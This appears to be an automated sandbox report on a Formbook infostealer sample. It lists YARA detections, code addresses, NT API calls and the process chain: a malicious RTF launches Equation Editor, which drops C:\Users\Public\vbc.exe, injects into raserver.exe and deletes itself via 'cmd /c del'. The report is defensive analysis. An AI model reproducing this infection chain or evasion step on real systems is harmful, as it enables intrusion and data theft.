            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0109A2A93_2_0109A2A9
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0045655F3_2_0045655F
            Source: C:\Users\Public\vbc.exeCode function: 3_2_004559183_2_00455918
            Source: C:\Users\Public\vbc.exeCode function: 3_2_004559283_2_00455928
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00455B783_2_00455B78
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0109A0353_2_0109A035
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004010304_2_00401030
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041DB584_2_0041DB58
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041E4E94_2_0041E4E9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00402D894_2_00402D89
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00402D904_2_00402D90
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041E59C4_2_0041E59C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D5A34_2_0041D5A3
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041EDB14_2_0041EDB1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041DE454_2_0041DE45
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409E5C4_2_00409E5C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409E604_2_00409E60
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00402FB04_2_00402FB0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0109A2A94_2_0109A2A9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4E0C64_2_00A4E0C6
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A7D0054_2_00A7D005
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00ACD06D4_2_00ACD06D
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A530404_2_00A53040
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A6905A4_2_00A6905A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4E2E94_2_00A4E2E9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AF12384_2_00AF1238
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AF63BF4_2_00AF63BF
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4F3CF4_2_00A4F3CF
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A763DB4_2_00A763DB
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A523054_2_00A52305
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A9A37B4_2_00A9A37B
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A573534_2_00A57353
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A854854_2_00A85485
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A614894_2_00A61489
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD443E4_2_00AD443E
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A8D47D4_2_00A8D47D
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD05E34_2_00AD05E3
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A6C5F04_2_00A6C5F0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5351F4_2_00A5351F
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A965404_2_00A96540
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A546804_2_00A54680
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5E6C14_2_00A5E6C1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AF26224_2_00AF2622
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A9A6344_2_00A9A634
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5C7BC4_2_00A5C7BC
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD579A4_2_00AD579A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A857C34_2_00A857C3
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AEF8EE4_2_00AEF8EE
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00ACF8C44_2_00ACF8C4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A7286D4_2_00A7286D
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5C85C4_2_00A5C85C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A529B24_2_00A529B2
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AF098E4_2_00AF098E
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A669FE4_2_00A669FE
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD394B4_2_00AD394B
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD59554_2_00AD5955
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00B03A834_2_00B03A83
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AFCBA44_2_00AFCBA4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AD6BCB4_2_00AD6BCB
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4FBD74_2_00A4FBD7
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00ADDBDA4_2_00ADDBDA
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A77B004_2_00A77B00
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AEFDDD4_2_00AEFDDD
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A80D3B4_2_00A80D3B
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A5CD5B4_2_00A5CD5B
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A82E2F4_2_00A82E2F
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A6EE4C4_2_00A6EE4C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AECFB14_2_00AECFB1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00AC2FDC4_2_00AC2FDC
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A60F3F4_2_00A60F3F
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A7DF7C4_2_00A7DF7C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0109A0354_2_0109A035
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECE0C66_2_01ECE0C6
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F4D06D6_2_01F4D06D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED30406_2_01ED3040
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EE905A6_2_01EE905A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EFD0056_2_01EFD005
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECF3CF6_2_01ECF3CF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EF63DB6_2_01EF63DB
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F763BF6_2_01F763BF
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F1A37B6_2_01F1A37B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED73536_2_01ED7353
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED23056_2_01ED2305
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECE2E96_2_01ECE2E9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F712386_2_01F71238
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F505E36_2_01F505E3
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EEC5F06_2_01EEC5F0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F165406_2_01F16540
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED351F6_2_01ED351F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EE14896_2_01EE1489
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F054856_2_01F05485
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F0D47D6_2_01F0D47D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F5443E6_2_01F5443E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F057C36_2_01F057C3
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EDC7BC6_2_01EDC7BC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F5579A6_2_01F5579A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EDE6C16_2_01EDE6C1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED46806_2_01ED4680
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F1A6346_2_01F1A634
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F726226_2_01F72622
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EE69FE6_2_01EE69FE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED29B26_2_01ED29B2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F7098E6_2_01F7098E
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F559556_2_01F55955
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F5394B6_2_01F5394B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F6F8EE6_2_01F6F8EE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F4F8C46_2_01F4F8C4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EF286D6_2_01EF286D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EDC85C6_2_01EDC85C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F5DBDA6_2_01F5DBDA
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECFBD76_2_01ECFBD7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F7CBA46_2_01F7CBA4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EF7B006_2_01EF7B00
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F83A836_2_01F83A83
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F6FDDD6_2_01F6FDDD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EDCD5B6_2_01EDCD5B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F00D3B6_2_01F00D3B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F42FDC6_2_01F42FDC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F6CFB16_2_01F6CFB1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EFDF7C6_2_01EFDF7C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EE0F3F6_2_01EE0F3F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EEEE4C6_2_01EEEE4C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01F02E2F6_2_01F02E2F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DE4E96_2_000DE4E9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DE59C6_2_000DE59C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD5A36_2_000DD5A3
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DDB586_2_000DDB58
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C2D896_2_000C2D89
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C2D906_2_000C2D90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DEDAD6_2_000DEDAD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DDE456_2_000DDE45
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C9E5C6_2_000C9E5C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C9E606_2_000C9E60
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000C2FB06_2_000C2FB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01ECDF5C appears 121 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F3F970 appears 84 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01ECE2A8 appears 38 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F1373B appears 245 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 01F13F92 appears 132 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A4DF5C appears 123 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A9373B appears 245 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A93F92 appears 132 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00ABF970 appears 84 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A4E2A8 appears 41 times
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A360 NtCreateFile,4_2_0041A360
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A410 NtReadFile,4_2_0041A410
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A490 NtClose,4_2_0041A490
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A540 NtAllocateVirtualMemory,4_2_0041A540
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A40A NtReadFile,4_2_0041A40A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041A53C NtAllocateVirtualMemory,4_2_0041A53C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A400C4 NtCreateFile,LdrInitializeThunk,4_2_00A400C4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A40078 NtResumeThread,LdrInitializeThunk,4_2_00A40078
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,4_2_00A40048
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3F9F0 NtClose,LdrInitializeThunk,4_2_00A3F9F0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3F900 NtReadFile,LdrInitializeThunk,4_2_00A3F900
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,4_2_00A3FAE8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_00A3FAD0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,4_2_00A3FBB8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00A3FB68
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,4_2_00A3FC90
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,4_2_00A3FC60
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,4_2_00A3FD8C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00A3FDC0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,4_2_00A3FEA0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_00A3FED0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,4_2_00A3FFB4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A410D0 NtOpenProcessToken,4_2_00A410D0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A40060 NtQuerySection,4_2_00A40060
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A401D4 NtSetValueKey,4_2_00A401D4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4010C NtOpenDirectoryObject,4_2_00A4010C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A41148 NtOpenThread,4_2_00A41148
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A407AC NtCreateMutant,4_2_00A407AC
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3F8CC NtWaitForSingleObject,4_2_00A3F8CC
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A41930 NtSetContextThread,4_2_00A41930
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3F938 NtWriteFile,4_2_00A3F938
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FAB8 NtQueryValueKey,4_2_00A3FAB8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FA20 NtQueryInformationFile,4_2_00A3FA20
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FA50 NtEnumerateValueKey,4_2_00A3FA50
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FBE8 NtQueryVirtualMemory,4_2_00A3FBE8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FB50 NtCreateKey,4_2_00A3FB50
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FC30 NtOpenProcess,4_2_00A3FC30
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A40C40 NtGetContextThread,4_2_00A40C40
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FC48 NtSetInformationFile,4_2_00A3FC48
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A41D80 NtSuspendThread,4_2_00A41D80
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FD5C NtEnumerateKey,4_2_00A3FD5C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FE24 NtWriteVirtualMemory,4_2_00A3FE24
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FFFC NtCreateProcessEx,4_2_00A3FFFC
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A3FF34 NtQueueApcThread,4_2_00A3FF34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC00C4 NtCreateFile,LdrInitializeThunk,6_2_01EC00C4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC07AC NtCreateMutant,LdrInitializeThunk,6_2_01EC07AC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBF9F0 NtClose,LdrInitializeThunk,6_2_01EBF9F0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBF900 NtReadFile,LdrInitializeThunk,6_2_01EBF900
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_01EBFBB8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01EBFB68
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFB50 NtCreateKey,LdrInitializeThunk,6_2_01EBFB50
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_01EBFAE8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01EBFAD0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFAB8 NtQueryValueKey,LdrInitializeThunk,6_2_01EBFAB8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01EBFDC0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFD8C NtDelayExecution,LdrInitializeThunk,6_2_01EBFD8C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFC60 NtMapViewOfSection,LdrInitializeThunk,6_2_01EBFC60
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFFB4 NtCreateSection,LdrInitializeThunk,6_2_01EBFFB4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01EBFED0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC01D4 NtSetValueKey,6_2_01EC01D4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC1148 NtOpenThread,6_2_01EC1148
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC010C NtOpenDirectoryObject,6_2_01EC010C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC10D0 NtOpenProcessToken,6_2_01EC10D0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC0060 NtQuerySection,6_2_01EC0060
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC0078 NtResumeThread,6_2_01EC0078
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC0048 NtProtectVirtualMemory,6_2_01EC0048
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBF938 NtWriteFile,6_2_01EBF938
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC1930 NtSetContextThread,6_2_01EC1930
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBF8CC NtWaitForSingleObject,6_2_01EBF8CC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFBE8 NtQueryVirtualMemory,6_2_01EBFBE8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFA50 NtEnumerateValueKey,6_2_01EBFA50
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFA20 NtQueryInformationFile,6_2_01EBFA20
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC1D80 NtSuspendThread,6_2_01EC1D80
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFD5C NtEnumerateKey,6_2_01EBFD5C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFC90 NtUnmapViewOfSection,6_2_01EBFC90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFC48 NtSetInformationFile,6_2_01EBFC48
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EC0C40 NtGetContextThread,6_2_01EC0C40
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFC30 NtOpenProcess,6_2_01EBFC30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFFFC NtCreateProcessEx,6_2_01EBFFFC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFF34 NtQueueApcThread,6_2_01EBFF34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFEA0 NtReadVirtualMemory,6_2_01EBFEA0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EBFE24 NtWriteVirtualMemory,6_2_01EBFE24
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA360 NtCreateFile,6_2_000DA360
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA410 NtReadFile,6_2_000DA410
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA490 NtClose,6_2_000DA490
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA540 NtAllocateVirtualMemory,6_2_000DA540
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA40A NtReadFile,6_2_000DA40A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DA53C NtAllocateVirtualMemory,6_2_000DA53C
            Source: vbc[1].exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: vbc.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: vbc[1].exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 3nkW4MtwSD.rtfVirustotal: Detection: 56%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"Jump to behavior
